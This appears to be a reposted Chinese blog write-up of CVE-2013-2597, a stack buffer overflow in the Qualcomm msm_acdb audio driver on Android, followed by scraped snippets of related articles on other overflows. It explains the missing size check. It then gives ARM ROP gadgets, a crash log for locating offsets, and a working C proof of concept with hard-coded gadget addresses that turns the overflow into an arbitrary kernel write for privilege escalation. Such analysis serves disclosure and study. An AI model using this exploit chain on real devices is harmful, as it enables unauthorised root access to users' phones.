Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)

/*

本文章由 莫灰灰 编写,转载请注明出处。

作者:莫灰灰    邮箱: [email protected]

*/

1. 漏洞描述

音频驱动acdb提供了一个ioctl的系统接口让应用层调用,然而,其在处理传进来的参数时没有做有效的边界检查。应用程序可以通过/dev/msm_acdb设备文件就能达到提升权限的目的。

2. 漏洞分析

原始代码如下
if (size <= 0) {
	pr_err("%s: Invalid size sent to driver: %d\n",
		__func__, size);
	result = -EFAULT;
	goto done;
}

if (copy_from_user(data, (void *)(arg + sizeof(size)), size)) {

	pr_err("%s: fail to copy table size %d\n", __func__, size);
	result = -EFAULT;
	goto done;
}
acdb驱动在处理ioctl的时候,只对输入的参数大小做了size<=0的判断,而没有做>的判断,紧接着,copy_from_user(data, (void *)(arg + sizeof(size)), size)的调用造成局部变量data的栈溢出。


3. 漏洞利用
1.原来的流程 - do_vfs_ioctl调用acdb_ioctl后返回

do_vfs_ioctl:
STMPW [SP], { R4-R9, LR }
...
BL acdb_ioctl
...
ADD SP, SP, #$44 // (2)
LDMUW [SP], { R4-R9, PC } // (1)

2.acdb_ioctl其中一段,可以获得控制PC的机会。修改寄存器的位置是 (3),这里可以操作R4-PC的所有数值了


acdb_ioctl:
...
ADD SP, SP, #$84
LDMUW [SP], { R4-R11, PC } // (3)

通过栈溢出,修改R5,R9,PC的值。


3.上面的指令,通过堆栈溢出,控制PC的值,跳转到下面代码执行

STR R5, [R9] // (4)
LDMUW [SP], { R4-R10, PC } // (5)

此处非常关键,主要通过STR指令,将R5的值设置到R9的地址中,即通过栈溢出达到任意地址写的目的。


4.执行(5)之后,为了堆栈平衡,栈要填充 4*8 字节,然后设置下一跳的PC,即返回到(2)那里去

ADD SP, SP, #$24 // (6)
LDMUW [SP], { R4-R9, PC }

5.实际栈的位置和p->data的位置需要硬编码适配。
p->data[...]的値需要初始化的时候设置。
硬编码的地址请在pc上通过崩溃的日志分析。
p->data[i]=i 这样来试探(注:给数据标上相对偏移,方便通过栈来定位),这个例子中,PC在&p->data[0x9c]的位置。

例:
ACDB=> ACDB ioctl not found!
Unable to handle kernel paging request at virtual address 9f9e9d9c
pgd = df56c000
[9f9e9d9c] *pgd=00000000
Internal error: Oops: 80000005 [#1] PREEMPT SMP
Modules linked in:
CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1)
PC is at 0x9f9e9d9c
LR is at acdb_ioctl+0x740/0x860
6.设置好堆栈布局
((unsigned int)&p->data[0x80]) = value;     //r5: PC - 4*7
((unsigned int)&p->data[0x90]) = address;   //r9: PC - 4*3
((unsigned int)&p->data[0x9c]) = (4)的地址; //pc: PC
((unsigned int)&p->data[0xbc]) = (6)地址;   //pc: PC + 4*8

4. PoC

static int
write_value(const acdb_param *param, unsigned long address, unsigned long value)
{
    const char *device_name = "/dev/msm_acdb";
    struct acdb_ioctl arg;

    int fd;
    int ret;
    int i;

    fd = open(device_name, O_RDONLY);
    if (fd < 0) {
      ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));
      return -1;
    }

    arg.size = param->pc2.pos + 4;

    for (i = 0; i < arg.size; i += 4) {
      *(unsigned long int *)&arg.data[i] = i;
    }

    *(unsigned long int *)&arg.data[param->address_pos] = address; // R9<span style="white-space:pre">	</span>
    *(unsigned long int *)&arg.data[param->value_pos] = value; // R5
    *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; //
    *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; //

    ret = ioctl(fd, 9999, &arg); // 随意触发一个ioctl,造成堆栈溢出,使得任意地址写入漏洞的触发
    close(fd);

    return 0;
}

其中,param的值对应如下:

{ DEVICE_SO05D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },

5.漏洞修复

增加了对size上限的控制


参考文章:
http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html
https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597
https://gist.github.com/fi01/5857693

Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)

时间: 2024-10-11 13:25:02

Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)的相关文章

Android KeyStore Stack Buffer Overflow (CVE-2014-3100)

/* 本文章由 莫灰灰 编写,转载请注明出处. 作者:莫灰灰    邮箱: [email protected] */ 1. KeyStore Service 在Android中,/system/bin/keystore进程提供了一个安全存储的服务.在过去的版本中,其他程序主要用过UNIX socket的守护进程/dev/socket/keystore去访问这个服务.然而,现在我们可以通过Binder机制去访问它. 每一个Android用户都有一块其私有的安全存储区域.所有秘钥信息使用一个随机ke

CVE-2016-2502-drivers/usb/gadget/f_serial.c in the Qualcomm USB driver in Android. Buffer Overflow Vulnerability reported by #plzdonthackme, Soctt.

CVE-2016-2502-drivers/usb/gadget/f_serial.c in the Qualcomm USB driver in Android.Buffer Overflow Vulnerability reported by #plzdonthackme, Soctt. struct ioctl_smd_write_arg_type { char *buf; unsigned int size; }; #define GSERIAL_BUF_LEN 256 char smd

buffer overflow

Computer Systems A Programmer's Perspective Second Edition We have seen that C does not perform any bounds checking for array references, and that local variables are stored on the stack along with state information such as saved register values and

buffer overflow vulnerabilitie

Computer Systems A Programmer's Perspective Second Edition Avoiding security holes.For many years,buffer overflow vulnerabilitieshave accounted for the majority of security holes in network and Internet servers. These vulnerabilities exist because to

【Valgrind】How to check buffer overflow/underflow in 10 mins

Introduction Buffer overflow/underflow frequently happens when we did something wrong with the array index, no matter the array is heap or stack, no matter you are reading the memory or writing the memory. Example 1: heap overflow // head_overflow.c

*** buffer overflow detected ***

[email protected]:~/http_load$ ./http_load -p 1021 -s 10 url*** buffer overflow detected ***: ./http_load terminated ======= Backtrace: =========/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7f8b1248c08c]/lib/x86_64-linux-gnu/libc.so.6(+0x11

ubuntu 14.04 ns2.35 ***buffer overflow detected **: ns terminated解决办法

1.按照如下教程安装 Install With Me !: How to Install NS-2.35 in Ubuntu-13.10 / 14.04 (in 4 easy steps) 2.运行一个例子程序时出现 ***buffer overflow detected **: ns terminated 3.参考现有方案出现,gcc error:4.4没有那个文件或目录 sudo apt-get intall gcc-4.4 sudo apt-get intall g++-4.4 修改tcl

Centos 6.3 Realtek Audio Driver Compile

/**************************************************************************** * Centos 6.3 Realtek Audio Driver Compile * 说明: * 临时在Centos上编译一下Audio声卡驱动,遇到要指定kernel路径的问题. * * 2017-4-21 深圳 南山龙华樟坑村 曾剑锋 ***************************************************

ORA-20000: ORU-10027: buffer overflow, limit of 20

要用dbms_output.put_line来输出语句,遇到以下错误:ERROR 位于第 1 行:ORA-20000: ORU-10027: buffer overflow, limit of 2000 bytesORA-06512: 在"SYS.DBMS_OUTPUT", line 35ORA-06512: 在"SYS.DBMS_OUTPUT", line 198ORA-06512: 在"SYS.DBMS_OUTPUT", line 139OR